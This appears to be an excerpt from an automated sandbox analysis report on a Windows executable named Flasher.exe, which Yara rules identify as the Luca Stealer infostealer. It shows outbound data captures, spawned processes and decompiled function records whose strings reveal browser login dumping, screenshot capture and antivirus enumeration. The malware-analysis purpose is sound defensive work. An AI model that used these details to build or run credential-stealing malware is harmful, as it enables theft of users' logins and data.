x~+,?~_O]y39~8p?(kV_W~:?s0~y[5G,u!uu6wQ{Rr9\|4t]wDsWBynEh&[c65wy\m}G9=v
2024-12-27 20:48:09 UTC	16384	OUT	Data Raw: e3 b9 78 c5 0d ff 57 eb 3f 7b 9d e4 17 d8 bd 37 bd 2b 4e bd e0 81 f1 88 f8 d3 f8 fe c7 3d 39 4e c6 e3 e3 96 9f f8 b8 b8 fe 71 af 8a 17 45 c4 2c ee 1a 37 7c ef 63 22 be f1 9f c4 c9 df ff b4 38 f5 9a 2f 8f 9b ff e1 bf 6c 35 af fa f2 b8 e5 df dc 33 ae ff 9c eb e3 c6 92 ef 1e d7 3f fc 47 e3 c6 8c 8b 4f fc b2 b8 e1 9e bf 1a 27 7f f6 a3 e3 d4 6f 3d aa c5 bc 23 07 59 ae c1 eb e7 8a 8f 8d 5b be e7 4e 71 fd 57 fd 62 c3 c7 dd e2 86 ef 7b 74 c4 73 bf 2f 4e fe f9 9d 22 12 57 5f 00 1c a0 7d ca 17 c6 ec 19 67 e3 ba 47 ff 6c bc e8 1e b9 0f f7 c8 73 ba e3 00 d0 7f 66 e7 96 67 1e cf 3a 39 bc ab 0b 2e eb 3c 2f eb 3c eb 9f c4 c9 d7 7d 7a 5b cf 3f f8 97 b5 9e 07 3d f9 fa 78 f5 43 5f 17 57 7f e5 8f c5 4d ae e7 df fe cd b8 fe f3 07 eb f9 d8 5c cf cb ee 11 a7 5e fd e9 f1 f2 cf Data Ascii: xW?{7+N=9NqE,7\|c"8/l53?GO'o=#Y[NqWb{ts/N"W_}gGlsfg:9.</<}z[?=xC_WM\^
2024-12-27 20:48:09 UTC	16384	OUT	Data Raw: 38 b7 ec d9 7c d0 75 8d 40 f6 a4 2c de 0d 1c e3 c5 15 e9 93 4a 8f d5 b1 8a 01 b2 87 ea dd b1 28 9b cf 18 e5 16 87 7a 3d c8 6b 97 c2 bc 7a 69 13 5f 1c c8 0d 0d 41 da cd a1 6c 1e ef c3 6b e3 c6 79 84 8e 15 67 7c ad 07 f1 ea f2 f2 99 47 02 56 9b 6a 85 93 eb 6f 71 18 a3 2c 59 f7 6e fa 0b 33 65 7d 8e f7 f5 fb ef b7 c3 f1 98 bf 6c 6a 77 fd 17 7c e6 68 71 c8 25 e8 73 0d e4 75 0a 57 ce 23 74 dd fc da cc 09 28 26 ce 58 15 ed f2 d6 0e 9d c5 b9 7c 21 ce 2f 7f e1 a9 5d 2a a3 b2 f9 e5 f6 2d d7 07 e4 ba d0 a7 dd 79 f4 cf 3b ad 05 dd 57 58 f1 25 c3 e2 03 9a 78 7d ce 85 bf 10 6e 71 a8 03 39 c6 50 e7 b1 94 dd 98 b2 5b 5f dd fa ca d0 f3 2b 8b d1 07 dd 66 9f da 25 73 e9 2f 82 8e 11 af ad 30 ea 62 d5 5d df ae 73 a0 55 3d 75 31 fe 32 ad ff 99 29 39 26 6d c6 e8 87 8e 57 d6 2e Data Ascii: 8\|u@,J(z=kzi_Alkyg\|GVjoq,Yn3e}ljw\|hq%suW#t(&X\|!/]*-y;WX%x}nq9P[_+f%s/0b]sU=u12)9&mW.
2024-12-27 20:48:09 UTC	16384	OUT	Data Raw: 35 9f da ff b9 9a 7b 35 ce 61 b5 d7 0d 8a f2 1e 55 3e 58 d6 89 b8 b2 2b 5f a2 75 54 8b b7 d6 95 0f dc 4b c9 5e c0 b7 ed fb e3 0d c0 e7 4d aa 37 38 cf cb d0 9a f1 db eb a2 4d 7a ee fb e3 e3 0d 40 67 f1 3c 6d 3f bf cf 5d 87 f3 19 ae 78 fc 6e bd 02 d9 73 ef 7d 2e 6d 7b 53 87 fe 09 a3 bc 97 e7 da fa 39 17 b7 97 eb 16 5b ef 66 8d b4 86 a4 f5 d8 f6 10 e7 3f 17 c7 fe a1 c7 56 2e f3 8d b2 ba b4 b5 41 8f d3 37 52 e2 36 1b 78 cb bc f7 95 91 98 08 2a 3e f7 33 6d 00 fa 1f 01 29 5f c0 56 2f 78 c6 fd d1 b4 6e cc 0d 34 20 73 ab 2b 5c fb dc 29 9c d8 3d 2a ff b8 01 b8 87 83 3e 06 f1 b0 f4 a0 de f1 f7 73 6f 5d 6f 2b dd 7b 4a 09 48 bb 71 c0 fc f0 77 88 71 6a 93 80 f9 41 cf 98 22 1f 04 81 e6 a1 4d 0e cc 39 8c 2d 6a d3 01 1d 6f ac 31 fa 27 57 32 ed 3e 44 fa 40 09 b4 43 eb 78 Data Ascii: 5{5aU>X+_uTK^M78Mz@g<m?]xns}.m{S9[f?V.A7R6x>3m)_V/xn4 s+\)=>so]o+{JHqwqjA"M9-jo1'W2>D@Cx
2024-12-27 20:48:09 UTC	16384	OUT	Data Raw: b4 23 f3 c7 fc 40 4c a3 b4 2e 72 93 cf e6 e0 7e cc 7e d0 f1 92 86 43 f3 a2 dd 3b 7f cb f3 96 7c 01 9f eb a6 f2 31 ff a8 7b e1 d4 63 97 3f e6 bf d8 93 7f ee 73 ac 8f bb 19 2f 96 e6 b1 a7 e7 f5 62 cf fd d6 79 bc fd a8 c3 da 63 7d eb f8 b0 7b 9f 69 fd e2 c0 7d 18 f6 e3 e7 95 9c 45 7d e2 c4 b1 3a da 6f 91 cc fa d3 2f b9 dd bd 6b da d5 46 7e 8c ac 76 e2 4f 71 b0 5b e7 d4 77 8a 9b ea 2f c3 c3 88 7b 2c 86 7f 03 ee a2 be 1f f3 3f 66 1f 55 ec 56 7c cc 67 17 7d 39 c9 7e 34 72 1e 1f a8 f1 6f 3d 50 d0 96 4b 98 1d da e6 cb 47 f3 42 9a ef d6 f9 00 23 9e f6 39 89 bb 68 7c 23 af 7f 31 53 3f 18 cf 76 ea 60 c4 9e 63 b4 15 2d 57 f9 3c 99 33 72 7d 1f 07 02 86 bf 3e 5d 3f ab 42 6f 0e 40 f1 7e 7e f9 19 2d 56 02 76 fc 81 c2 e5 24 ae 2b a5 a4 d4 55 9b 96 5e 00 4c 36 cc 05 54 3d Data Ascii: #@L.r~~C;\|1{c?s/byc}{i}E}:o/kF~vOq[w/{,?fUV\|g}9~4ro=PKGB#9h\|#1S?v`c-W<3r}>]?Bo@~~-Vv$+U^L6T=
2024-12-27 20:48:09 UTC	16384	OUT	Data Raw: 4d 2e 00 7e 52 2e 00 7a 51 74 ef fd 09 f0 83 cf 7d c7 21 ae b1 9f 3d f9 87 2e 86 21 c2 45 ab ff f9 bd 9e b0 f3 ba f1 d3 2f bf 51 e6 67 3e f9 5a b5 1a 7d 21 7b cc 17 9f ff 06 e0 97 3d ff f9 f1 b9 6f bb fb ad b6 e1 74 f1 d1 8b ec 42 c4 c3 b4 00 f8 0f 72 01 70 3a 56 fd f3 df bf f6 01 4f 0c 29 ef 02 9b b2 5e fd e0 ad 78 cf bf fb b2 f1 cd bf 8d 76 cb 3c 35 17 01 fd 16 e5 f8 c9 b0 23 94 b6 6c fe b7 1f 78 75 fc f5 ef ff ed 9d 9f 01 bb 00 e8 58 fd 2f 6f f5 17 12 74 fb 7b 2f 02 1e 1d bf 06 ae cf 7d 65 5c 10 8b 20 5c f4 5b b9 80 d7 b6 d4 93 0b 86 2b ce d2 be 8c 55 c4 e6 e6 1b a9 03 c2 17 82 54 e7 65 a8 f5 2c 4e 4f f3 1a cc a7 ec aa 23 e7 60 1a 9c 8c 09 51 9f cd 9e f3 b7 48 f5 b1 dd 3c 55 9f 31 8f 81 1f 06 7b f5 27 e3 5a 47 36 b7 bd cf fd 3b ee e5 03 5e 3c 5a 57 8f Data Ascii: M.~R.zQt}!=.!E/Qg>Z}!{=otBrp:VO)^xv<5#lxuX/ot{/}e\ \[+UTe,NO#`QH<U1{'ZG6;^<ZW
2024-12-27 20:48:09 UTC	16384	OUT	Data Raw: f7 ae ef ed ba 75 d1 ed c3 76 7c 5c 94 61 f5 11 d6 36 f4 5d c7 7f a2 14 00 1d df 70 cc ce eb 50 d6 3e a4 7e 77 ae fb ef c0 30 f6 e9 b2 e7 29 2c e6 5a bd 84 cf dd e9 0f cb b6 54 d5 07 16 fa 52 e4 4e bf 6c da fd 71 dd 75 63 56 18 f4 25 ac e3 f5 61 a6 97 97 7c 7d 58 d8 23 9f 2a 50 5d 34 d4 97 22 77 0b 6b 0a f9 59 85 49 75 40 43 ae b3 8b 91 b4 43 c3 76 59 9d 3c 50 63 54 06 a2 bf 28 fb 02 1c b9 f9 c2 bd 7b d5 f2 7b 9f e3 95 a0 c5 14 bb eb 0f 1c 13 0f 4d d7 65 71 a9 9e 7f ec 47 02 42 1b 50 05 81 c8 4d 7d 51 0b 51 e3 db 21 57 41 9e 9f 1e db 84 d4 c7 d8 f6 09 44 8f 11 b9 95 6f 62 93 ad 0f b4 40 ea 81 8a a7 41 d9 56 82 d4 e7 33 92 bc 7a 40 b6 b0 ca 0a d3 7c 40 93 97 94 7b 9f ca 92 ba 31 99 a3 3a b1 d3 e3 d7 54 3c 65 68 f1 e5 25 68 b2 71 3a a9 1f d2 0e 07 ca df a2 Data Ascii: uv\|\a6]pP>~w0),ZTRNlqucV%a\|}X#*P]4"wkYIu@CCvY<PcT({{MeqGBPM}QQ!WADob@AV3z@\|@{1:T<eh%hq:
2024-12-27 20:48:11 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Dec 2024 20:48:10 GMT Content-Type: application/json Content-Length: 1135 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Target ID:	0
Start time:	15:47:59
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\Flasher.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Flasher.exe"
Imagebase:	0x7ff6d34f0000
File size:	3'266'048 bytes
MD5 hash:	7A16F2F0629A440695945DB2A191C6A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:48:03
Start date:	27/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture \| Select -ExpandProperty DisplayName"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:48:03
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	46.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	167

Executed Functions

Function 00007FF6D35E26B0 Relevance: 201.6, APIs: 105, Strings: 8, Instructions: 3849memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6D35EACC2,?,?,?,00000000,?,?,?,00007FF6D35E3B0B), ref: 00007FF6D35E274C
HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6D35EACC2,?,?,?,00000000,?,?,?,00007FF6D35E3B0B), ref: 00007FF6D35E2844
HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6D35EACC2,?,?,?,00000000,?,?,?,00007FF6D35E3B0B), ref: 00007FF6D35E29A2
HeapFree.KERNEL32(?,00000000,?,?,?,00007FF6D35EACC2,?,?,?,00000000,?,?,?,00007FF6D35E3B0B), ref: 00007FF6D35E29CF
GetEnvironmentStringsW.KERNEL32 ref: 00007FF6D35E2A97

Strings

#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "batch file arguments are invalid, xrefs: 00007FF6D35E6118
.exeprogram not found, xrefs: 00007FF6D35E38EC
\?\\, xrefs: 00007FF6D35E3727
PATHstd\src\sys_common\process.rs, xrefs: 00007FF6D35E56FB
]?\\, xrefs: 00007FF6D35E372F
assertion failed: is_code_point_boundary(self, new_len), xrefs: 00007FF6D35E40E2, 00007FF6D35E412B
assertion failed: self.height > 0, xrefs: 00007FF6D35E6D05
\cmd.exemaximum number of ProcThreadAttributes exceeded, xrefs: 00007FF6D35E4B88, 00007FF6D35E4BC9

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$EnvironmentStrings
String ID: #$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "batch file arguments are invalid$.exeprogram not found$PATHstd\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0
API String ID: 2767186067-3265660329
Opcode ID: c4b4304efdc3ef1e8ce3ea43a7fbe4a544ed6573ab869ae442f3b89131ec6507
Instruction ID: 2184cd15ba97cbcd2f1e8eb8152c1558625cfda68e848e8b784e47b241ddcb63
Opcode Fuzzy Hash: c4b4304efdc3ef1e8ce3ea43a7fbe4a544ed6573ab869ae442f3b89131ec6507
Instruction Fuzzy Hash: 92838062A09FD588E7748F21D8463FEA7A0FB44789F445136CA5DEBB98DF389261C304

Function 00007FF6D35CD99E Relevance: 133.3, APIs: 60, Strings: 15, Instructions: 2074memorywindowCOMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32 ref: 00007FF6D35CD9FF
HeapFree.KERNEL32 ref: 00007FF6D35CDAC5
HeapFree.KERNEL32 ref: 00007FF6D35CDAF8
CreateDCW.GDI32 ref: 00007FF6D35CDBB1
CreateCompatibleDC.GDI32 ref: 00007FF6D35CDBBD
CreateCompatibleBitmap.GDI32 ref: 00007FF6D35CDBCE
SelectObject.GDI32 ref: 00007FF6D35CDBDD
SetStretchBltMode.GDI32 ref: 00007FF6D35CDBEB
StretchBlt.GDI32 ref: 00007FF6D35CDC1F
GetDIBits.GDI32 ref: 00007FF6D35CDC93
GetObjectW.GDI32 ref: 00007FF6D35CDCBA
DeleteDC.GDI32 ref: 00007FF6D35CDD50
DeleteDC.GDI32 ref: 00007FF6D35CDD55
DeleteObject.GDI32 ref: 00007FF6D35CDD5A
DeleteDC.GDI32 ref: 00007FF6D35CDD81
DeleteDC.GDI32 ref: 00007FF6D35CDD86
DeleteObject.GDI32 ref: 00007FF6D35CDD8B
HeapFree.KERNEL32 ref: 00007FF6D35CDDC1
memmove.VCRUNTIME140 ref: 00007FF6D35CDEC5
DeleteDC.GDI32 ref: 00007FF6D35CDF62
DeleteDC.GDI32 ref: 00007FF6D35CDF6C
DeleteObject.GDI32 ref: 00007FF6D35CDF73
memmove.VCRUNTIME140(?), ref: 00007FF6D35CE0E6
HeapFree.KERNEL32 ref: 00007FF6D35CE6C9
HeapFree.KERNEL32 ref: 00007FF6D35CE816
HeapFree.KERNEL32 ref: 00007FF6D35CE8E9
HeapFree.KERNEL32 ref: 00007FF6D35CE912
HeapFree.KERNEL32 ref: 00007FF6D35CE93B
HeapFree.KERNEL32 ref: 00007FF6D35CE972
HeapFree.KERNEL32 ref: 00007FF6D35CE9A9
HeapFree.KERNEL32 ref: 00007FF6D35CE9E0
memmove.VCRUNTIME140 ref: 00007FF6D35CEE53
memmove.VCRUNTIME140 ref: 00007FF6D35CEED9
memmove.VCRUNTIME140 ref: 00007FF6D35CEF46
memmove.VCRUNTIME140 ref: 00007FF6D35CEFFF
HeapFree.KERNEL32 ref: 00007FF6D35CF034
HeapFree.KERNEL32 ref: 00007FF6D35CF053
HeapFree.KERNEL32 ref: 00007FF6D35CF39D
HeapFree.KERNEL32 ref: 00007FF6D35CFDD8
HeapFree.KERNEL32 ref: 00007FF6D35CFDFA
HeapFree.KERNEL32 ref: 00007FF6D35CFE1C
HeapFree.KERNEL32 ref: 00007FF6D35CFE5E
HeapFree.KERNEL32 ref: 00007FF6D35CFE80
RtlFreeHeap.NTDLL ref: 00007FF6D35CFEC2
RtlFreeHeap.NTDLL ref: 00007FF6D35CFF16
HeapFree.KERNEL32 ref: 00007FF6D35CFF3E
RtlFreeHeap.NTDLL ref: 00007FF6D35CFF60
RtlFreeHeap.NTDLL ref: 00007FF6D35D002A
HeapFree.KERNEL32 ref: 00007FF6D35D0098
GetMonitorInfoW.USER32 ref: 00007FF6D35D026E

Strings

, xrefs: 00007FF6D35CDC0C
IHDR, xrefs: 00007FF6D35CE34F
zTXt, xrefs: 00007FF6D35CF4BF
fdAT, xrefs: 00007FF6D35CFD40
tEXt, xrefs: 00007FF6D35CE7F1
acTL, xrefs: 00007FF6D35CE5C5
IEND, xrefs: 00007FF6D35CFFBF
cHRM, xrefs: 00007FF6D35CE563
PLTE, xrefs: 00007FF6D35CE3A3
sRGB, xrefs: 00007FF6D35CE4D4
tRNS, xrefs: 00007FF6D35CE3ED
, xrefs: 00007FF6D35CE547
gAMA, xrefs: 00007FF6D35CE44A
iTXt, xrefs: 00007FF6D35CF9D8
gAMA, xrefs: 00007FF6D35CE517

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$Delete$memmove$Object$Create$CompatibleStretch$BitmapBitsDisplayEnumInfoModeMonitorMonitorsSelect
String ID: $ $IEND$IHDR$PLTE$acTL$cHRM$fdAT$gAMA$gAMA$iTXt$sRGB$tEXt$tRNS$zTXt
API String ID: 127125892-1981636098
Opcode ID: c966a4e52b91691c3d3d76ac73b2bc39e10f55f4d800f19b33edad17018e0b42
Instruction ID: 413e092c5ff44b5316073057b40b67033c92f580fd5552f769a45cc3fca69398
Opcode Fuzzy Hash: c966a4e52b91691c3d3d76ac73b2bc39e10f55f4d800f19b33edad17018e0b42
Instruction Fuzzy Hash: C4239E72A0DBC585E6709B11E4453EEB3A1FB89B84F444136CA8DA7B99DF3CD1A5CB00

Function 00007FF6D3506D24 Relevance: 116.4, APIs: 69, Strings: 5, Instructions: 5439memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6D3506D30
memmove.VCRUNTIME140 ref: 00007FF6D350A5DF
memmove.VCRUNTIME140 ref: 00007FF6D350A62F
memmove.VCRUNTIME140 ref: 00007FF6D350A67F
HeapFree.KERNEL32 ref: 00007FF6D350A6D4
HeapFree.KERNEL32 ref: 00007FF6D350A96F
HeapFree.KERNEL32 ref: 00007FF6D350AB2D

Part of subcall function 00007FF6D3532A40: memmove.VCRUNTIME140(?,?,?,00007FF6D351EDE9), ref: 00007FF6D3532A88

HeapFree.KERNEL32 ref: 00007FF6D3510E54
HeapFree.KERNEL32 ref: 00007FF6D3510E82

Strings

lid UTF-8 sequence in column nameC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rusqlite-0.28.0\src\column.rs, xrefs: 00007FF6D350F472
ractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName, xrefs: 00007FF6D350AA34
ingInvalidCharsetInvalidDateTimeDerConstraintFailedLifetimeErrorIncompleteNomErrordepthSqliteFailureSqliteSingleThreadedModeFromSqlConversionFailureIntegralValueOutOfRangeInvalidParameterNameInvalidPathExecuteReturnedResultsQueryReturnedNoRowsInvalidColumnInde, xrefs: 00007FF6D350E30B
LOCALAPPDATAsrc\chromium\dumper.rs, xrefs: 00007FF6D3510633
ghijklmnopqrstuvwxyz0123456789, xrefs: 00007FF6D350EDF8

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$memmove
String ID: LOCALAPPDATAsrc\chromium\dumper.rs$ghijklmnopqrstuvwxyz0123456789$ingInvalidCharsetInvalidDateTimeDerConstraintFailedLifetimeErrorIncompleteNomErrordepthSqliteFailureSqliteSingleThreadedModeFromSqlConversionFailureIntegralValueOutOfRangeInvalidParameterNameInvalidPathExecuteReturnedResultsQueryReturnedNoRowsInvalidColumnInde$lid UTF-8 sequence in column nameC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rusqlite-0.28.0\src\column.rs$ractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName
API String ID: 2650465384-2981620428
Opcode ID: 74bbf044e0daa670557e0f3f6b77c29a5bfd14fabd50091a070a4c5c1e25d04a
Instruction ID: 03ce82f5708f4655f4618a2d6d99ed26975c45cb2102f9d0744527819c98065f
Opcode Fuzzy Hash: 74bbf044e0daa670557e0f3f6b77c29a5bfd14fabd50091a070a4c5c1e25d04a
Instruction Fuzzy Hash: E2D38036A09FC581EB618F14E4522EDB364FB88B50F449222DB9D637A9DF3DD5A2C700

Function 00007FF6D35142D8 Relevance: 108.3, APIs: 63, Strings: 7, Instructions: 3291memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6D3514594
HeapFree.KERNEL32 ref: 00007FF6D3514647
HeapFree.KERNEL32 ref: 00007FF6D3514B9C
HeapFree.KERNEL32 ref: 00007FF6D3514C6E
memmove.VCRUNTIME140 ref: 00007FF6D3514DEC
HeapFree.KERNEL32 ref: 00007FF6D3514E0D

Part of subcall function 00007FF6D35DF580: HeapFree.KERNEL32 ref: 00007FF6D35DF65D
Part of subcall function 00007FF6D35DF580: HeapFree.KERNEL32 ref: 00007FF6D35DF670

memmove.VCRUNTIME140 ref: 00007FF6D351640A
HeapFree.KERNEL32 ref: 00007FF6D35170AB
HeapFree.KERNEL32 ref: 00007FF6D3517125
HeapFree.KERNEL32 ref: 00007FF6D3517151
HeapFree.KERNEL32 ref: 00007FF6D3517171
HeapFree.KERNEL32 ref: 00007FF6D351719A

Part of subcall function 00007FF6D34F99F4: HeapFree.KERNEL32 ref: 00007FF6D3606F76

CloseHandle.KERNEL32 ref: 00007FF6D35173CF
HeapFree.KERNEL32 ref: 00007FF6D3517496
CloseHandle.KERNEL32 ref: 00007FF6D35174DC

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D35147C3, 00007FF6D35160E6, 00007FF6D35188AE
loginsstruct LoginFilestruct LoginFile with 1 element, xrefs: 00007FF6D351876B, 00007FF6D351879B
a Display implementation returned an error unexpectedly/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs, xrefs: 00007FF6D35160AF
APPDATAsrc\firefox\firefox.rs, xrefs: 00007FF6D35143F5, 00007FF6D3514E8A
logi, xrefs: 00007FF6D35175A6
(, xrefs: 00007FF6D3516DB8
C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.25\src\proto\h2\client.rs, xrefs: 00007FF6D3515C0C, 00007FF6D3515E04

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandlememmove
String ID: C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.25\src\proto\h2\client.rs$($APPDATAsrc\firefox\firefox.rs$a Display implementation returned an error unexpectedly/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs$called `Result::unwrap()` on an `Err` value$logi$loginsstruct LoginFilestruct LoginFile with 1 element
API String ID: 3396608759-2528929634
Opcode ID: 4e8803e9d7ca1e5dc0475faaa10482a8fc7b32e9d378250fa87d3d0c8fb26494
Instruction ID: aea6e21d75468462e233fd4832e4d81c9fbd099833e1fe2eeb3efa95910e378f
Opcode Fuzzy Hash: 4e8803e9d7ca1e5dc0475faaa10482a8fc7b32e9d378250fa87d3d0c8fb26494
Instruction Fuzzy Hash: 40834732A09BC681E6719F15E4453EEB3A0FB98784F445226DACDA3B59DF3CD1A5CB00

Function 00007FF6D352257A Relevance: 96.2, APIs: 30, Strings: 23, Instructions: 3404COMMON

Download Yara Rule

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D352D6D0, 00007FF6D352DADF, 00007FF6D352DBE4
postal, xrefs: 00007FF6D35231EA
-NoProfile-NonInteractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName, xrefs: 00007FF6D35245DF
\\?\fatal runtime error: I/O error: operation failed to complete synchronously, xrefs: 00007FF6D3525B50
yHql_`%, xrefs: 00007FF6D35270AC
a Display implementation returned an error unexpectedly/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs, xrefs: 00007FF6D352DA4A
connectioncontent-dispositioncontent-encodingcontent-languagecontent-lengthcontent-locationcontent-rangecontent-security-policycontent-security-policy-report-onlycontent-typecookiedntdateetagexpectexpiresforwardedfromif-matchif-modified-sinceif-none-matchif-ra, xrefs: 00007FF6D3523313, 00007FF6D352335D
city, xrefs: 00007FF6D35230B9
,!_k, xrefs: 00007FF6D35275FA
entInvalidParameterCountSqlInputErrorsql, xrefs: 00007FF6D352890E
um\decryption_core.rs, xrefs: 00007FF6D3525A2B
root\SecurityCenter2, xrefs: 00007FF6D3526006
asn, xrefs: 00007FF6D3523378
assertion failed: nsec >= 0 && nsec < NSEC_PER_SECC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\time-0.1.45\src\lib.rs, xrefs: 00007FF6D352D5DB
nown, xrefs: 00007FF6D35244FC
powershe, xrefs: 00007FF6D352454C
timezoneutc, xrefs: 00007FF6D35234EA
isp, xrefs: 00007FF6D352332E
hell.exe, xrefs: 00007FF6D352453E
Must not use a decoder that has finished., xrefs: 00007FF6D352D47A
country, xrefs: 00007FF6D3522F98
c/main.rs, xrefs: 00007FF6D3526EA9
C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.25\src\proto\h2\client.rs, xrefs: 00007FF6D3528E12

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID:
